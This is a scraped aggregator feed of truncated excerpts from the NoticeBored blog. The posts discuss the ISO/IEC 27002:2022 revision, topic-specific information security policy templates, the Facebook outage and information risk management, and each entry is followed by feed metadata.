SoA, specifically in the notes for clause 6.1.3. More specifically: ]]> 2022-02-25T12:38:34+00:00 http://blog.noticebored.com/2022/02/transition-arrangements-for-isoiec-27001.html www.secnews.physaphae.fr/article.php?IdArticle=4179676 False None None None NoticeBored - Experienced IT Security professional SecAware ISMS templates such as the detailed security controls maturity metric/checklist: ]]> 2022-02-21T20:23:11+00:00 http://blog.noticebored.com/2022/02/isoiec-27002-update.html www.secnews.physaphae.fr/article.php?IdArticle=4159240 False None None None NoticeBored - Experienced IT Security professional mentioned recently here on the blog that there can be strategic elements to policies, just as there are operational aspects to the supporting procedures and guidelines. With the new year fast approaching, I'd like to explore that further today.Warning: your blinkers are coming off. Prepare for the glare.Take for instance the corporate responses to COVID-19. Out of necessity, organisations in lockdown shifted rapidly from on-site office work and in-person meetings to home-working, using video conferencing, email and collaborative approaches. Although that may have been a purely reactive, un-pre-planned response to the global crisis that erupted (despite prior pandemics and warnings arising from increasing international travel), it was facilitated by longer-term planned, strategic changes and investments in a resilient workforce with flexible working practices and positive attitudes, strong relationships within and without the organisation, plus appropriate tools and technologies - in particular the cloud (since about 2000) and, of course, IT (since about 1970). Thinking about it, the very concept of 'office work', or indeed 'work', stretches back still further, along with 'business', 'commerce', 'profit' and 'money'. Gradual shifts in human society on an almost evolutionary scale have led to where we are right now ... and will continue going forward, presenting strategic challenges and opportunities to those who are awake to the possibilities ahead (both positive and negative), sufficiently resilient to cope with adversity yet resourceful, strong enough and well-positioned to surge forward when it makes sense. In some organisations, policies and practices for home/virtual working were hastily developed and adopted during and in response to the COVID outbreak. In others, either the policies and practices were already in place, or there was no specific need for them since flexible, tech-enabled working was very much the norm already. A few laggards are still struggling to catch up even today, and failing to thrive in adversity may mean failing to survive in perpetuity. [Aside: how on Earth can today's politicians justify holding a climate change conference as a physical, in-person event, during COVID no less, rather than virtually, on-line? Are we even on the same planet? Shakes head in disbelief.]The relation goes both ways: policies can prompt strategic changes, and vice versa. Thinking forward, virtual working presents opportunities for global collaboration on an unprecedented scale, with reduced costs, increased efficiencies, access to a global talent pool and of course global markets. 'Globalization' is not just about establishing a widespread physical presence and brands: it's also about harnessing a widely distributed and culturally diverse workforce, harnessing technology to link, leverage and exploit the very best of the best. ]]> 2021-11-27T09:26:57+00:00 http://blog.noticebored.com/2021/11/weaving-strategies-with-policies.html www.secnews.physaphae.fr/article.php?IdArticle=3712965 False Guideline None None NoticeBored - Experienced IT Security professional Congratulations on completing this cook's tour of the topic-specific information security policies in ISO/IEC 27002:2022 (forthcoming). Today we reach the end of the track, reflecting back on our journey and gazing forward to the next objective.Through the blog, we have stepped through the eleven topic-specific policy examples called out in clause 5.1, discussing various policy-related matters along the way: 0.  Introduction: an initial overview of the classical 'policy pyramid'. 1.  Access control: 'policy axioms' are key principles underpinning policies. 2.  Physical and environmental security: ignore these aspects at your peril!3.  Asset management: using templates/models to develop your policies.4.  Information transfer: consider the business context for policies. 5.  Networking security: risks associated with data and social networks.6.  Information security incident management: unique or general?7.  Backup: there's more to information risk management than cyber!  8.  Cryptography and key management: important for ]]> 2021-11-05T13:07:47+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/D8ssTjmdNBM/topic-specific-policies-1211-concluding.html www.secnews.physaphae.fr/article.php?IdArticle=3611157 False None APT 17 None NoticeBored - Experienced IT Security professional ISO/IEC 27002:2022 is another potential nightmare for the naïve and inexperienced policy author. Despite the context, the title of the standard's policy example ("secure development") doesn't explicitly refer to software or IT. Lots of things get developed - new products for instance, business relationships, corporate structures and so on. Yes, even security policies get developed! Most if not all developments involve information (requirements/objectives, specifications, plans, status/progress reports etc.) and potentially substantial information risks ... so the policy could cover those aspects, ballooning in scope from what was presumably intended when the standard was drafted.Even if the scope of the policy is constrained to the IT context, the information security controls potentially required in, say, software development are many and varied, just as the development and associated methods are many and varied, and more poignantly so are the information risks. Your homework challenge, today, is to consider, compare and contrast these five markedly different IT development scenarios:Commercial firmware being developed for a small smart actuator/sensor device (a thing) destined to be physically embedded in the pneumatic braking system of commercial vehicles such as trucks and coaches, by a specialist OEM supplier selected on the basis of lowest price. A long-overdue technical update and refresh for a German bank's mature financial management application, developed over a decade ago by a team of contractors long since dispersed or retired, based on an obsolete database, with fragmentary documentation in broken English and substantial compliance implications, being conducted by a large software house based entirely in India. A cloud-based TV program scheduling system for a global broadcaster, to be delivered iteratively over the next two years by a small team of contractors under the management of a consultancy firm for a client that freely admits it barely understands phase 1 and essentially has no idea what might be required next, or when.A departmental spreadsheet for time recording by home workers, so their time can be tracked and recharged to clients, and their productivity can be monitored by management.Custom hardware, firmware and autonomous software required for a scientific exploration of the Marianas trench - to be deployed in the only two deep-sea drones in existence that are physically capable of delivering and recovering the payload at the extreme depths required.You may have worked in or with projects/initiatives vaguely similar to one, maybe even two or three of these, but probably not all five - and these are just a few random illustrative examples plucked from the millions of such activities going on right now. The sheer number and variety of possibilities is bewildering, so how on earth can one draft a sensible policy?As is the way with ISO27k, the trick is to focus on the information ]]> 2021-10-23T16:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/9OkGaAP3f2E/topic-specific-example-1111-secure.html www.secnews.physaphae.fr/article.php?IdArticle=3551830 False Patching,Guideline None None NoticeBored - Experienced IT Security professional ISO/IEC 27002:2022, "management of technical vulnerabilities" is the kind of phrase that speaks volumes to [some, switched-on, security-aware] IT pro's ... and leaves ord'nry folk perplexed, befuddled and nonplussed. In this case, that may be appropriate if it aligns with the intended audience for the policy, perhaps not if the policy needs to be read, understood and complied with by, say, workers in general, for whom "Patching" is arguably a more apt and widely-known term.So, do you need to tell workers to keep their IT systems, smartphones and IoT things up to date with security patches? If so, before launching into the policy development process, think very carefully about the title, content and style of your policy - plus the associated procedures, guidelines, awareness and training materials, help-desk scripts or whatever you decide is necessary to achieve your information risk management objectives in this regard (more on that below).Hinson tip: what are your information risk management objectives in this regard (concerning 'technical vulnerabilities' ... or whatever aspect/s you believe need addressing)? What information risks are you facing, how significant are they (relative to other things on your plate) and how do you intend to treat them? Seriously, think about it. Talk it through with your peers and professional colleagues. Draft a cunning treatment plan for this particular subset of information risks, discuss it with management and refine it. Lather, rinse, repeat until you achieve consensus (or wear down the blockers and negotiate a fragile settlement), and finally you are primed to craft your policy.Once more, we have your starter-for-ten, a generic patching policy template designed to help get you smartly off the starting blocks:While we don't presently offer a policy template on vulnerability disclosures (something worth adding to our to-do list, maybe?), we do have others that are to some extent relevant to this topic, for instance on change and configuration management and information systems security. I'll pick up on that point at the end of this blog series.Aside f]]> 2021-10-22T16:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/oP9rTVTtvmM/topic-specific-example-1011-management.html www.secnews.physaphae.fr/article.php?IdArticle=3547340 False Vulnerability None None NoticeBored - Experienced IT Security professional classification policy template, I'm reluctant to recommend classification as a general approach unless it is mandated for your organisation ... in which case your class/category definitions, processes and handling rules are probably already specified by whoever mandated it (perhaps in law), so you would need to check/update the template accordingly.In summary, the template is here, a basic classification policy starter for just $20. It's not one of the topic-specific policy examples I personally would have selected for the standard, though, and I have serious reservations about the corresponding controls in section 5. To me, it's an outdated, unhelpful and largely irrelevant approach - except perhaps for the ]]> 2021-10-21T15:57:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/iTpvsXkz-II/topic-specific-policy-911-information.html www.secnews.physaphae.fr/article.php?IdArticle=3541311 False None None None NoticeBored - Experienced IT Security professional ISO/IEC 27002 and picked as a topic-specific policy example for the forthcoming 3rd edition in order to include something directly relevant to governmental organisations, although to be fair crypto is a consideration for all of us these days. Many (most?) websites are now using HTTPS with TLS for encryption, for example, while cryptographic methods are commonly used for file and message integrity checks, such as application/patch installers that integrity-check themselves before proceeding, and password hashing.Here's a glimpse of one I prepared earlier:Like all our templates, this one is generic. Organisations with specific legal or contractual obligations in this area (such as governmental and defense companies bound to employ particular algorithms, key lengths and technologies such as physically secure hardware crypto modules, or companies bound by PCI-DSS) would need to adapt it accordingly. You'll see that it mentions the Information Classification Policy: I'll have more to blog about classification tomorrow.If you've been tagging along on my tiki-tour of the topic-specific policy examples in ISO/IEC 27002:2022, and if you read that LinkeDin piece by Chris Hall that I recommended, you will probably by now recognise the standard document structure we've adopted for all our policy templates. The main elements are:Page header with a logo (our logo in the template, yours to download and customise) and a short, pithy, catchy policy title.Information security policy up-front to be crystal clear about the nature and ownership of the policy, since some topics could equally belong to other corporate functions (e.g. our "Fraud" policy template is, in fact, an information security policy addressing the information risks associated with fraud, misrepresentation and so on, not an HR or legal policy about disciplinary procedures and compliance).      Policy title, big and bold to stand out. The precise wording is important here (I'll return to that point in another blog piece).Policy summary, outlining]]> 2021-10-20T16:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/fh9i03AKXT4/topic-specific-policy-811-cryptography.html www.secnews.physaphae.fr/article.php?IdArticle=3534956 False None APT 17 None NoticeBored - Experienced IT Security professional ISO/IEC 27002:2022, spanning the divide between 'cybersecurity' and 'the business'.Why do data need to be backed up? What's the purpose? How should it be done? Questions like these immediately spring to mind (mine anyway!) when I read the recommendation for a topic-specific policy on backup ... but as usual, there's more to it than that.Play along with me on this worked example. If you already have a backup policy (or something with a vaguely similar title), I urge you to dig it out at this point and study it (again!) before returning to read the remainder of this blog. Think about it. Does it address those three questions? What else does it cover? What is its scope? Is it readable, understandable, motivational - not just for you but for its intended audience/s? Does it state who those audiences are? Any spelling mistakes, grammatical errors or layout problems? Is it lengthy, officious, boring? Conversely, is it short, cryptic and puzzling? Is it more of a detailed plan for what backups to do, when and how, than a clear and unequivocal statement of management's overall expectations re backups? Is it consistent both internally (no contradictions or omissions) and externally (e.g. does it accord with other policies and adequately reflect any applicable compliance requirements)? All good so far? If not, hopefully this blog series has given you food for thought! Either way, what is it missing? What relevant matters does your backup policy not cover, either failing to mention them at all or perhaps gloss over them too superficially to have any impact?That's a harder question to answer, even if you were the one who wrote the existing policy. We all (me included!) tend to focus on our areas of interest and expertise. Policies are often formulated and written with particular scenarios, situations or incidents in mind, typically forming part of the response that drives continuous improvement. We don't always take the trouble to consult with colleagues, research the topic, explore the risks and controls, and think both broadly and deeply about the subject area - the topic of the policy. Frankly, we just don't think, failing to recognise and address our own biases and failings. Don't agree? OK, look again at the start of my second paragraph. I consciously slipped "data" in there, just as I deliberately mentioned "cyber" in the first one. Did you even notice the bias towards IT? Is your backup policy exclusively about backing up computer data, most likely digital data from corporate IT systems? Does it lay out the technologies, plus the frequencies and types of backup, in some detail?Don't get me wrong, that's a very important topic, essential in fact for virtually all modern organisations and indeed individuals today. My concern is that it still only covers part of the problem space, a peak on the risk landscape you could say.What about information in other forms and locations:]]> 2021-10-19T16:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/FKLN3ASz1BU/topic-specific-policy-711-backup.html www.secnews.physaphae.fr/article.php?IdArticle=3529756 False None None None NoticeBored - Experienced IT Security professional ISO/IEC 27002, being the only one of eleven example titles in the standard that explicitly states "information security".  I ask myself why? Is there something special about the management of events classed as 'information security incidents', as opposed to other kinds? Hmmmm, yes there are some specifics but I'm not entirely convinced of a need for a distinct, unique policy. I feel there is more in common with the management of all kinds of incident than there are differences in respect of infosec incidents, hence "Incident management policy" makes more sense to me.Here's one I prepared earlier.Organisations deal with events and incidents all the time. Aside from the humdrum routines of business, things don't always go to plan and unexpected situations crop up. Mature organisations typically have incident management policies already, plus the accompanying procedures and indeed people primed and ready to respond to 'stuff' at the drop of a hat. Wouldn't it make sense, therefore, to ensure that "information security incidents" are handled in much the same way as others?That's fine for mature organisations. For the rest, the SecAware information security policy template on incident management concentrates on the specifics of infosec incidents and outlines incident management in general. A workable infosec policy can prompt the development and maturity of incident management by:Documenting and formalising things - particularly the process, expressing management's expectations and requirements in clear terms (e.g. striking the right balance between investigating and resolving incidents, especially where business continuity is a factor).Stabilising the working practices, de-cluttering things, making them more consistent and hence amenable to management control.Enabling reviews and audits, leading to systematic process improvement where appropriate.Discouraging inappropriate shortcuts (e.g. ineptly investigating serious issues, compromising important forensic evidence) while facilitating escalation and management decisions where appropriate (e.g. determining whether forensic investigation is justified). ]]> 2021-10-18T20:19:51+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/U2aFEkEyMwc/topic-specific-policy-611-information.html www.secnews.physaphae.fr/article.php?IdArticle=3526425 False Guideline None None NoticeBored - Experienced IT Security professional a policy template. I alluded to this at the end of the last blog piece as one of several security policies relating to information transfer:Less obviously, there are also potentially significant information risks and security controls applicable to social networking and social media ... and yes, we have a policy template for that too:Although 'social media' generally refers to Facebook, Twitter, LinkeDin and the like, many of the information risks pre-date them, back to the days of in-person personal and business interactions through professional membership organisations, special interest groups, town hall meetings, breakfast clubs and chambers of commerce. Other comms technologies such as the telephone, email and videoconferencing, plus 'groups' and collaborative working, have dramatically expanded our opportunities for social contact, and also materially increased our exposure to global threats. Globalisation is a far bigger issue than 'networking' implies, with pros and cons.On the upside, ready access to peers, knowledgeable and experienced colleagues and heaps of advice through the Internet makes high quality information very available. It's a fantastic resource for the connected global community. On the downside, the sheer volume and variety of information online can be overwhelming. It is tricky to distinguish and sift the wheat from the chaff. Even your ninja Googling skills can only go so far! That dips into the realm of mis/disinformation, bias and fraud, further areas where well-written corporate policies can help. ]]> 2021-10-16T18:08:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/HT5HCcBNbVE/topic-specific-policy-511-networking.html www.secnews.physaphae.fr/article.php?IdArticle=3522631 False None None None NoticeBored - Experienced IT Security professional "Information transfer" is another ambiguous, potentially misleading title for a policy, even if it includes "information security". Depending on the context and the reader's understanding, it might mean or imply a security policy concerning:Any passage of information between any two or more end points - network datacommunications, for instance, sending someone a letter, speaking to them or drawing them a picture, body language, discussing business or personal matters, voyeurism, surveillance and spying etc.One way flows or a mutual, bilateral or multilateral exchange of information.Formal business reporting between the organisation and some third party, such as the external auditors, stockholders, banks or authorities.Discrete batch-mode data transfers (e.g. sending backup or archival tapes to a safe store, or updating secret keys in distributed hardware security modules), routine/regular/frequent transfers (e.g. strings of network packets), sporadic/exceptional/one-off transfers (e.g. subject access requests for personal information) or whatever. Transmission of information through broadcasting, training and awareness activities, reporting, policies, documentation, seminars, publications, blogs etc., plus its reception and comprehension.  Internal communications within the organisation, for example between different business units, departments, teams and/or individuals, or between layers in the management hierarchy."Official"/mandatory, formalised disclosures to authorities or other third parties.Informal/unintended or formal/intentional communications that reveal or disclose sensitive information (raising confidentiality concerns) or critical information (with integrity and availability aspects). Formal provision of valuable information, for instance when a client discusses a case with a lawyer, accountant, auditor or some other professional. Legal transfer of information ownership, copyright etc. between parties, for example when a company takes over another or licenses its intellectual property.Again there are contextual ramifications. The nature and importance of information transfers differ between, say, hospitals and health service providers, consultants and their clients, social media companies and their customers, and battalion HQ with operating units out in the field. There is a common factor, however, namely information risk. The in]]> 2021-10-15T12:40:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/MHAW1fkbrQs/topic-specific-policy-411-information.html www.secnews.physaphae.fr/article.php?IdArticle=3516936 False General Information,Guideline APT 17 None NoticeBored - Experienced IT Security professional This piece is different to the others in this blog series. I'm seizing the opportunity to explain the thinking behind, and the steps involved in researching and drafting, an information security policy through a worked example. This is about the policy development process, more than the asset management policy per se. One reason is that, despite having written numerous policies on other topics in the same general area, we hadn't appreciated the value of an asset management policy, as such, even allowing for the ambiguous title of the example given in the current draft of ISO/IEC 27002:2022.  The standard formally but (in my opinion) misleadingly defines asset as 'anything that has value to the organization', with an unhelpful note distinguishing primary from supporting assets. By literal substitution, 'anything that has value to the organization management' is the third example information security policy topic in section 5.1 ... but what does that actually mean?Hmmmm. Isn't it tautologous? Does anything not of value even require management? Is the final word in 'anything that has value to the organization management' a noun or verb i.e. does the policy concern the management of organizational assets, or is it about securing organizational assets that are valuable to its managers; or both, or something else entirely?  Well, OK then, perhaps the standard is suggesting a policy on the information security aspects involved in managing information assets, by which I mean both the intangible information content and (as applicable) the physical storage media and processing/communications systems such as hard drives and computer networks?Seeking inspiration, Googling 'information security asset management policy' found me a policy by Sefton Council along those lines: with about 4 full pages of content, it covers security aspects of both the information content and IT systems, more specifically information ownership, valuation and acceptable use:1.2. Policy Statement The purpose of this policy is to achieve and maintain appropriate protection of organisational assets. It does this by ensuring that every information asset has an owner and that the nature and value of each asset is fully understood. It also ensures that the boundaries of acceptable use are clearly defined for anyone that has access to ]]> 2021-10-14T17:20:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/RzQfkTDBmhs/topic-specific-policy-311-asset.html www.secnews.physaphae.fr/article.php?IdArticle=3512451 False Tool,Guideline APT 17 None NoticeBored - Experienced IT Security professional Yesterday I blogged about the "access control" topic-specific policy example in ISO/IEC 27002:2022. Today's subject is the "physical and environmental security" policy example.Physical security controls are clearly important for tangible information assets, including IT systems and media, documentation and people - yes, people.The first "computers" were humans who computed numbers, preparing look-up tables to set up field guns at the right elevation and azimuth angles to hit designated targets at specific ranges given the wind speed and direction, terrain and ordinance - quite a lot of factors to take into account in the field, so the pre-calculated tables helped speed and accuracy provided the gunners used them correctly anyway, and I'm sure they were highly trained and closely overseen!Aside from a little mental arithmetic, most of us don't "compute" many numbers today but we still process staggering quantities of information flowing constantly from our senses and memories. In the work context, the trite mantra "Our people are our greatest assets" may be literally true, given the knowledge, experience, expertise and creativity of workers. We have valuable intangible proprietary and personal information locked in our heads, trade secrets, innovative ideas and more. We are information assets, although to be fair the true values vary markedly (and, yes, some are liabilities!). Why do you think some people are paid more than others?Aside from the commercial value aspect, workers require adequate protection against unacceptable health and safety risks according to national laws and regulations. We also deserve respect, personal space, privacy, understanding, fair and reasonable compensation and so on, raising ethical and further legal or contractual obligations. Environmental protection ensures that workers have reasonably pleasant workplaces, partly for health and ethical reasons, partly for productivity reasons. Computer systems likewise work more reliably under manufacturer-specified ambient temperatures and require appropriate electricity supplies. The total demands for cooling and power can be significant in a large computer room or data centre. Oh and don't forget the physical security and environmental controls for portable equipment and home offices - safe storage, for instance, plus security cables, etched corporate logos, good quality power supplies and UPSs, spare batteries and more. Environmental controls relating to noxious by-products, greenhouse gases, dangerous emissions, excessive noise, explosive/flammable products, dangerous processes etc. are particularly important for chemical and manufacturing industries, among others ... but are they 'information security controls'? I would argue yes for some, perhaps most of them. For instance, electric valve and sluice gate controllers on a sewage treatment plant that are computerised and networked smart things are at risk from malware, hackers, inept system administration or configuration errors, software design flaws and programming bugs, mechanical problems, power glitches and more. So, there is clearly a wide variety of information risks and controls in this area, collectively presenting significant challenges in various organisatio]]> 2021-10-13T15:59:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/4caQJ8iX83E/topic-specific-policy-211-physical-and.html www.secnews.physaphae.fr/article.php?IdArticle=3506842 False None None None NoticeBored - Experienced IT Security professional ISO/IEC 27002 recommends having a topic-specific information security policy on "access control". OK, fine, so what would that actually look like, in practice?Before reading on, think about that for a moment. Imagine if you were tasked to draft an access control policy, what would it cover? What form would it take?How would you even start? How about something along these lines, for starters:What is access control intended to achieve? In about half a page, the background section explains the rationale for controlling access to assets (meaning valuable things such as information in various forms, including but more than just digital data).The policy goes on to state that, whereas access to information should be restricted where necessary, access by workers should be permitted by default unless there are legitimate reasons to restrict it. In other words, a liberal approach that releases information for use unless it needs to be restricted for some reason ... which in turn begs questions about what are those legitimate reasons?  Who decides and on what basis?The alternative approach is to restrict access to assets by default unless there sound reasons to permit access, begging the same questions.The template policy takes both approaches, in the form of these complementary 'policy axioms':Policy axioms (guiding principles) [if !supportLists]-->A. Access to corporate information assets by workers should be permitted by default unless there is a legitimate need to restrict it. [if !supportLists]-->B. Access to corporate information assets by third-parties should be restricted by default unless there is a legitimate need to permit it. The idea is that, generally speaking, "workers" (which is defined elsewhere to include employees on the organization's payroll - staff and managers - plus third party employees and others such as interns, temps and consultants working for and on behalf of the organisation, under its co]]> 2021-10-12T19:44:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/qlMa4Qxj6VM/topic-specific-policy-111-access-control.html www.secnews.physaphae.fr/article.php?IdArticle=3504314 False None APT 17 None NoticeBored - Experienced IT Security professional Clause 5.1 of the forthcoming new 3rd edition of ISO/IEC 27002 recommends two complementary types of information security policies.Firstly: At the highest level, organizations should define an “information security policy” which is approved by top management and which sets out the organization's approach to managing its information security.The policy (singular) should address requirements derived from various sources, and include a bunch of general policy statements, for example laying out the organisation's commitments (as stated by senior management) to satisfy applicable requirements relating to information security, and to improve the information security management system continually. In addition:At a lower level, the information security policy should be supported by topic-specific policies, as needed to further mandate the implementation of information security controls. Topic-specific policies are typically structured to address the needs of certain target groups within an organization or to cover certain security areas. Topic-specific policies should be aligned and complementary to the information security policy of the organization.Topic-specific policies (plural) should be aligned with and support the high-level policy, providing additional details in various areas. The standard lists 11 topics as examples ... and I plan to talk about those day by day through this blog. After that, I'll write about integrating all the policies, including the top one, into a coherent and comprehensive policy suite - taking an holistic/system view of the entire policy structure. So, tune in tomorrow for the first of twelve enthralling episodes!]]> 2021-10-11T15:57:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/cQz0fiLdAJk/isoiec-27002s-overall-and-topic.html www.secnews.physaphae.fr/article.php?IdArticle=3498120 False None None None NoticeBored - Experienced IT Security professional I gather from friends and the news media that there was an unplanned outage earlier this week at Facebook. I'm told that Facebook is a fairly popular social media platform - some have said addictive. As you can no doubt tell, I don't see the attraction and I'm definitely not hooked. If it weren't for the brouhaha, I wouldn't have even noticed.I understand the outage was caused by a technical issue in the network - something to do with the BGP configuration. I'm not particularly interested in, and probably wouldn't even understand, the details. The self same issue locked Facebook's IT administrators out of their own systems, leaving them cut off and unable to address/reverse/fix the issue for several hours, causing mild panic and a little outrage among its users, customers and other stakeholders. The same issue took down related websites too. Doubtless the admins were stressed out, possibly frantic, while their managers were unimpressed.I'm bringing it up here to point out a lesson for all other organisations, not just those reliant on remote system admin. If the network access is broken and unavailable, for whatever reason, remote admin is also broken and unavailable. That's screamingly obvious to all of us now with 20/20 hindsight thanks to the Farcebook Fiasco, and clearly an issue worth addressing by organisations that use and rely on remote system/network/app/IT admin, of which I'm sure there are many. I'm told that cloud is in, and the Interwebs are quite useful.Less obviously, the incident a neat reminder that foresight is even more valuable, more specifically information risk management. Regardless of the nature of the technical issue and preceding activities that sparked the outage, single points of failure are a class of vulnerability well worth identifying and addressing, especially for anything important. The solution is known as defence-in-depth, an approach that is universally employed by all living organisms - except, it seems, Facebook IT people.  As to how they might have mitigated the risks, there are several possible means of administering network systems aside from remote access through the same network. I'm not even going to attempt to list them. Go ahead, Google if you care. There are myriad ways that information services may be interrupted, some deliberate/intentional, many accidental, inadvertent or due to natural causes. It's simply impracticable to attempt to identify and deal with them all, individually, hence the value of a much more generalised approach to specifying, achieving, maintaining and being confident in the required availability. It's called resilience, a natural complement to contingency planning, both of which are parts of the nebulous approach called business continuity management. That's more than enough waffle]]> 2021-10-07T14:24:08+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/E1sA9oaHVnY/an-important-lesson-from-farcebook.html www.secnews.physaphae.fr/article.php?IdArticle=3480863 False Vulnerability None None NoticeBored - Experienced IT Security professional It could be argued that 'management' of all kinds (including information risk and security management) is or rather shouldbe a rational process, meaning that managers should systematically gather and evaluate information, take account of sound advice, make sensible decisions, put in place whatever is necessary to implement the decisions etc., all the time acting in the organization's best interests, furthering its business objectives, strategies, policies etc. In practice, there are all manner of issues with that approach that complicate matters, frustrate things, and lead to 'suboptimal' situations that may be - or at least appear to be - irrational, inappropriate or unnecessary. In particular, there are numerous paradoxes. For examples:The obvious core objective of a typical commercial company to make a substantial profit for its owners may conflict with various ethical and legal objectives to spend money on protecting and furthering the wider interests of society and individuals - including their privacy. There's a fine line between motivating/supporting/encouraging/directing and demotivating/micro-managing/exploiting employees. Efficiency in most matters comes at the cost of effectiveness, and vice versa. They say quality is free, but is that a lie? ]]> 2021-07-29T16:36:24+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/XFApGQz-u1o/pinball-management.html www.secnews.physaphae.fr/article.php?IdArticle=3146681 False Guideline None None NoticeBored - Experienced IT Security professional 'Reducing uncertainty' is the prime focus of  information risk management today. We do our level best to identify, characterise, quantify, evaluate and where possible reduce the probabilities and/or adverse consequences of various possible events.  Uncertainty is an inherent part of the problems we typically face. We don't know exactly what might happen, nor how or when, and we aren't entirely sure about the consequences. We worry about factors both within and without our control, and about dependencies and complex interactions that frustrate our efforts to predict and control our fortunes. We adopt fallback and recovery arrangements, and apply contingency thinking with the intention of being better prepared and resourced for unanticipated situations ahead.    A random comment on LinkeDin set me thinking about the converse: 'reducing uncertainty' is the flip side of 'increasing certainty', in other words information risk management is equally about increasing certainty of beneficial, valuable outcomes such as not suffering the adverse consequences of incidents as often and/or as severely.  It's also about increasing certainty in general, which is why we put so much effort into gathering and assessing information, monitoring and measuring things, implementing mitigating 'information security controls' that give us some semblance of control over the risks.Assurance is a big part of reducing uncertainty. We check and test things, review stuff and conduct audits to increase both our knowledge of, and our confidence in, the arrangements. We seek to identify and tease out potential issues that need to be addressed in order to avoid nasty surprises. Resilience is another chunk. Building the strength and capability to respond effectively and efficiently to whatever might happen, maintaining critical activities throughout, is a powerful approach that extends from individuals through families, teams and departments, to organisations, industries and society at large.Thanks to those uncertainties, we are inevitably building on shaky foundations. Our information risk management practices and information security controls are imperfect ... but at the same time they earn their keep by generating more value than they cost, for example by:Providing credible information about various situations, allowing us to make rational decisions, prioritise and plan things, allocate appropriate resources etc.;Reducing or constraining the problem space where possible, increasing our ability to focus on The Stuff That Really Matters;Allowing us to consider and deal with potential incidents in advance, knowing that we will struggle to do so during some future crisis. Along with]]> 2021-07-11T09:37:45+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/DtnTA7HKLPQ/managing-certainty.html www.secnews.physaphae.fr/article.php?IdArticle=3047619 False None None None NoticeBored - Experienced IT Security professional ^ Although it's tempting to dismiss such questions as rhetorical, trivial or too difficult, there are reasons for taking them seriously*. Today I'm digging a little deeper into the basis for posing such tricky questions, explaining how we typically go about answering them in practice, using that specific question as an example. OK, here goes.The accepted way of determining the sufficiency of controls is to evaluate them against the requirements. Adroitly sidestepping those requirements for now, I plan to blabber on about the evaluation aspect or, more accurately, assurance.Reviewing, testing, auditing, monitoring etc. are assurance methods intended to increase our knowledge.  We gather relevant data, facts, evidence or other information concerning a situation of concern, consider and assess/evaluate it in order to:Demonstrate, prove or engender confidence that things are going to plan, working well, sufficient and adequate in practice, as we hope; andIdentify and ideally quantify any issues i.e. aspects that are not, in reality, working quite so well, sufficiently and adequately. Assurance activities qualify as controls to mitigate risks, such as information risks associated with information risk and security management e.g.: Mistakes in our identification of other information risks (e.g. failing to appreciate critical information-related dependencies of various kinds); Biases and errors in our assessment/evaluation of identified information risks (e.g. today's obsessive focus on “cyber” implies down-playing, perhaps even ignoring other aspects of information security, including non-cyber threats such as physical disasters and hum]]> 2021-06-26T17:27:23+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/XARVjFUnZq8/are-our-infosec-controls-sufficient.html www.secnews.physaphae.fr/article.php?IdArticle=2985374 False Malware,Guideline None None NoticeBored - Experienced IT Security professional Anyone seeking information security standards or guidance is spoilt for choice e.g.:ISO27k - produced by a large international committee of subject matter experts and national representatives  NIST SP 800 series – well researched, well written, actively maintained ... and FREE!IT Grundschutz - a typically thorough Germanic approach, to the point of absurdity (4,800 pages!)   CSA - cloud security guidance is their home turfCOBIT - takes a deliberately different perspective on 'risk' and 'control' Secure application development standards such as those from OWASP IT standards and methods as a whole: relevant because IT or cyber security is clearly a big part of information security HR, physical security, privacy and business continuity standards and methods as a whole: filling-in the substantial gaps in IT or cyber security Risk management standards, the best of which at least mention the importance of identifying and managing information risksPCI DSS - not really an infosec standard so much as a contractual mechanism forcing organizations using credit cards to play their part in maintaining card security ]]> 2021-05-25T14:27:57+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/IOK3dzSePMs/stepping-on-cracks.html www.secnews.physaphae.fr/article.php?IdArticle=2833972 False None None None NoticeBored - Experienced IT Security professional ISO27001security.compages here and there on ongoing standards activities. The most significant thing to report is that the 3rd (2013) edition of ISO/IEC 27002 appears on-track to reach final draft stage soon and will hopefully be approved this year, then published soon after (during 2022, I guess).   The standard is being extensivelyrestructured and revised, collating and addressing about 300 pages of comments from the national standards bodies at every stage.  The editorial team are doing an amazing job!   The new '27002 structure will have the controls divided into 4 broad categories or types i.e. technical, physical, people and 'organizational' [=other]: For comparison, the standard is currently structured into 13 security domains: '27002 will nearly double in size, going from 90 to 160 pages or so, thanks to new controls and additional advice including areas such as cloud and IoT security.  Virtually all of the original controls have been retained but most have been reworded for the new structure and current practice … and there's an appendix mapping the old clauses to the new.  '27001 Annex A is being updated to reflect the changes, and a new version of that standard is due to be published in the 2nd quarter of 2022.  I presume other standards based on '27002 (such as ']]> 2021-05-24T17:23:22+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/ywsAJY844T8/news-on-isoiec-27002.html www.secnews.physaphae.fr/article.php?IdArticle=2829433 False None None None NoticeBored - Experienced IT Security professional Just a brief note today: it's a lovely sunny Saturday morning down here and I have Things To Do.I'm currently enjoying another book by one of my favourite tech authors: Yossi Sheffi's ]]> 2021-04-24T09:47:20+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/TT_yFFhUTew/pre-shocks-and-after-shocks.html www.secnews.physaphae.fr/article.php?IdArticle=2686094 False Guideline None None NoticeBored - Experienced IT Security professional the ISO27k Forum, someone naively suggests that we should Keep It Simple Stupid. After all, an ISO27k ISMS is, essentially, simply a structured, systematic approach for information risk management, isn't it? At face value, then, KISS makes sense. In practice, however, factors that complicate matters for organizations designing, implementing and using their ISMSs include different: Business contexts – different organization sizes, structures, maturities, resources, experiences, resilience, adaptability, industries etc.; Types and significances of risks – different threats, vulnerabilities and impacts, different potential incidents of 